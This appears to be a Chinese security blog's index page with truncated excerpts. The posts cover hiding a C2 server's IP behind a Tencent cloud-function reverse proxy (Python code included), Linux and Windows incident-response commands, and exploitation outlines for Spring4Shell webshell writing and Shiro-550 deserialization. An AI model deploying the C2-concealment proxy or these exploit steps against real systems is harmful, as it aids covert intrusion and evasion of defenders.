2022-12-29 腾讯云函数实现IP隐匿 腾讯云函数实现IP隐匿 通过腾讯云函数进行反代,实现利用腾讯云CDN 隐匿C2 IP。 1、登陆腾讯云控制台-云函数 2、新建函数服务 3、粘贴下列代码 # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context): C2 = 'http://114.114.114.114' # 114替换为你的 C2 IP ,协议为 HTTP或者HTTPS需要与监听器对应。 path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event['body'], headers=headers... admin 2022-12-29 未分类 495 阅读 0 评论 2022年12月29日 495 阅读 0 评论
2022-11-26 Linux应急排查 Linux应急排查 Linux下排查方法Linux系统基础知识Etc/sysconfig/network-script/ 网卡配置目录结构/bin 放置系统命令目录,/bin目录可以在维护模式下还可以被操作/boot 放置开机使用的文件,包括linux核心文件以及开机选单与开机所需设定文件/dev 放置装置与周边设备都是以文件的形态,存在于这个目录当中/etc 系统主要的设定文件几乎都放置在这个目录内,列如人员的账户密码文件,各种服务的起始文件等等/home 系统预设的使用者家目录(home,directory) 你新增的用户家目录都会规范进来/lib和/lib64 系统的函试库非常的多,而.lib或者/lib64放置常用的函数/opt 存放第三方软件和位置目录/root root用户的家目录/sbin linux有非常多指令是用来设定系统环境的,这些指令只有root才能够利用来设置系统,里面包括了开机,修复,还原系统所需要的指令/tmp 任何人都可以读写的目录,重新启动目录中存放的文件会被删除 用户组所有者,所在组,其它组文件普通权限Rwx r=4 w=2 x=1文件特殊权限SUID:s出现在文件... admin 2022-11-26 应急响应 633 阅读 0 评论 2022年11月26日 633 阅读 0 评论
2022-11-26 Windows 排查方法 Windows 排查方法 Windows 排查方法Windows常见命令Regedit 查看策略表Msconfig 查看系统配置Taskmgr 启动任务管理器Eventvwr,msc 打开日志的命令Gpedit.msc 打开本地组策略Compmgmt.msc 计算机管理Lusrmgr.msc 打开用户与组Taskschd 打开计划任务Net user xxx /add 添加用户Net localgroup administrators xxxx /add 把某用户放到管理员组里面Net session 查询当前会话Net start 查看当前运行的服务Net use 查看当前共享连接Net share 查看共享映射的盘符,连接状态Net share xxx /del 删除共享的链接查看隐藏用户可以去,用户管理Findstr /s /I “hellow” ** 查询包含hellow 的关键字Attrib 查看文件属性Attrid 1.txtAttrid -R常见路径系统变量敏感文件路径%WINDIR% C盘 windows%WINDIR%\system32\% c盘windo... admin 2022-11-26 Windows应急响应 582 阅读 0 评论 2022年11月26日 582 阅读 0 评论
2022-03-31 Spring Rce CVE-2022-22965 Spring Rce CVE-2022-22965 漏洞介绍继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”。漏洞版本JDK 9及以上版本 使用Tomcat 服务器 以war 部署运行 使用了spring-webmvc或 spring-webflux Spring框架版本是 5.3.0 到 5.3.17, 5.2.0 到 5.2.19,以及更旧的版本。原理Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,攻击者通过构造恶意请求获取 AccessLogValve 对象并注恶意字段值触发 pipeline 机制可写任意路径下的文件。利用步骤覆盖 Tomcat 特定的ClassLoader属性,将访问日志文件路径更改为 web根目录下的某个位置,并将日志模式(写入的数据)更改为包含 webshell 代码的常量模式。这会导致JSP_webshell被放到web 根目录下。向写入的 webshell 发送查询... admin 2022-03-31 漏洞复现 1,845 阅读 0 评论 2022年03月31日 1,845 阅读 0 评论
2022-03-11 apache shiro-550 apache shiro-550 漏洞详情shiro反序列化原因是shiro的一个机制为了让浏览器或服务器重启后不丢失用户的登陆状态,会将用户信息保存到 rememberMe字段中 然后发送到服务端,服务端再对它进行base64解密,aes解密,再进行反序列化,由于在 1.2.4 这个版本里 shiro的key是固定的,所以可以通过构造一段恶意类经过aes加密再base64加密然后放到 rememberMe 伪造cookie信息,来让服务端加载,进而触发反序列化漏洞详细步骤:1.首先正常登录,然后生成带有rememberme的返回cookie值。2.生成cookie,shiro会提供rememberme功能,可以通过cookie记录登录用户,从而记录登录用户的身份认证信息,即下次无需登录即可访问。处理rememberme的cookie的类为org.apache.shiro.web.mgt.CookieRememberMeManager3.之后进入serialize,对登录认证信息进行序列化4.然后加密,调用aes算法。5.加密结束,然后在在org/apache/shiro/web/mgt/CookieRememb... admin 2022-03-11 漏洞复现 1,310 阅读 0 评论 2022年03月11日 1,310 阅读 0 评论